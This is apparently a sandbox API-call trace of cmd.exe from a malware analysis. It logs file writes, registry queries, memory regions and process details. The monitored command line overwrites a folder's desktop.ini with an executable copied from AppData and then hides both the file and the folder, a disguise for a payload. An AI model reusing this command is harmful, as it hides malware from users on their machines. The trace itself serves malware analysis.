[0220.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, 
lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.383] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.383] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x200, lpOverlapped=0x0) returned 1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.383] GetFileType (hFile=0x4c) returned 0x1 [0220.383] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ebf8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ebf8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec48*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec48*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ec98*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ece8*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] GetFileType (hFile=0x4c) returned 0x1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.384] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed38*, lpNumberOfBytesWritten=0x26dd8c*=0x50, lpOverlapped=0x0) returned 1 [0220.384] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26ed88*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26ed88*, lpNumberOfBytesWritten=0x26dd8c*=0x20, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] ReadFile (in: hFile=0x54, lpBuffer=0x26eba8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dd98, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesRead=0x26dd98*=0x32, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] GetFileType (hFile=0x4c) returned 0x1 [0220.385] _get_osfhandle (_FileHandle=1) returned 0x4c [0220.385] WriteFile (in: hFile=0x4c, lpBuffer=0x26eba8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26dd8c, lpOverlapped=0x0 | out: lpBuffer=0x26eba8*, lpNumberOfBytesWritten=0x26dd8c*=0x32, lpOverlapped=0x0) returned 1 [0220.385] _get_osfhandle (_FileHandle=4) returned 0x54 [0220.385] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dd78 | out: lpNewFilePointer=0x0) returned 1 [0220.385] _close (_FileHandle=4) returned 0 [0220.385] FindNextFileW (in: hFindFile=0x310e60, lpFindFileData=0x26ee0c | out: lpFindFileData=0x26ee0c) returned 0 [0220.386] GetLastError () returned 0x12 [0220.386] FindClose (in: hFindFile=0x310e60 | out: hFindFile=0x310e60) returned 1 [0220.386] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0220.387] _close (_FileHandle=3) returned 0 [0220.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.387] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.387] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.387] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.388] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.388] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.388] SetConsoleInputExeNameW () returned 0x1 [0220.388] GetConsoleOutputCP () returned 0x1b5 [0220.388] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.388] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.388] exit (_Code=0) Process: id = "581" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0x6bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32974 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32975 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32976 start_va = 0x40000 
end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32977 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 32978 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32979 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32980 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32981 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32982 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 32983 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33272 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33273 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33274 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33275 start_va = 0x320000 end_va = 0x41ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 33276 start_va = 0x590000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 33277 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33278 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33279 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33280 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33281 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33282 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33283 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33284 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = 
"\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33285 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33286 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33287 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33288 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33289 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33290 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33291 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 33292 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 33293 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 33294 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 33295 start_va = 0x11a0000 end_va = 0x1302fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 33456 start_va = 0x1310000 end_va = 0x15defff entry_point = 
0x1310000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 785 os_tid = 0x610 [0220.929] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af834 | out: lpSystemTimeAsFileTime=0x2af834*(dwLowDateTime=0xb87c1000, dwHighDateTime=0x1d440a9)) [0220.929] GetCurrentProcessId () returned 0x6bc [0220.929] GetCurrentThreadId () returned 0x610 [0220.929] GetTickCount () returned 0x3da47 [0220.930] QueryPerformanceCounter (in: lpPerformanceCount=0x2af82c | out: lpPerformanceCount=0x2af82c*=27771875334) returned 1 [0220.930] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.930] __set_app_type (_Type=0x1) [0220.930] __p__fmode () returned 0x76b331f4 [0220.931] __p__commode () returned 0x76b331fc [0220.931] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.931] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.931] GetCurrentThreadId () returned 0x610 [0220.931] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x610) returned 0x38 [0220.931] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.931] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.931] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.931] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.931] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af7c4 | out: phkResult=0x2af7c4*=0x0) returned 0x2 [0220.932] VirtualQuery (in: lpAddress=0x2af7fb, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x2af000, 
AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af794, dwLength=0x1c | out: lpBuffer=0x2af794*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.932] GetConsoleOutputCP () returned 0x1b5 [0220.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.932] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.932] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.932] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.933] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.933] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.933] _get_osfhandle (_FileHandle=0) returned 0x3 
[0220.933] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.933] GetEnvironmentStringsW () returned 0x330458* [0220.933] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.933] GetEnvironmentStringsW () returned 0x330458* [0220.934] FreeEnvironmentStringsW (penv=0x330458) returned 1 [0220.934] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae734 | out: phkResult=0x2ae734*=0x40) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x8, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x0, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, 
lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegCloseKey (hKey=0x40) returned 0x0 [0220.934] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae734 | out: phkResult=0x2ae734*=0x40) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x40, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x1, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x0, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x4, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x4) returned 0x0 [0220.934] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae73c, lpData=0x2ae740, 
lpcbData=0x2ae738*=0x1000 | out: lpType=0x2ae73c*=0x0, lpData=0x2ae740*=0x9, lpcbData=0x2ae738*=0x1000) returned 0x2 [0220.934] RegCloseKey (hKey=0x40) returned 0x0 [0220.934] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.935] srand (_Seed=0x5b8863b6) [0220.935] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" [0220.935] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" [0220.935] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331bb8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.935] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.935] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.935] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, 
nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.935] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.935] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.936] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.936] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.936] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.936] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.936] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.936] GetEnvironmentStringsW () returned 0x3325a8* [0220.936] FreeEnvironmentStringsW (penv=0x3325a8) returned 1 [0220.936] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.936] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.936] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.936] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.936] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 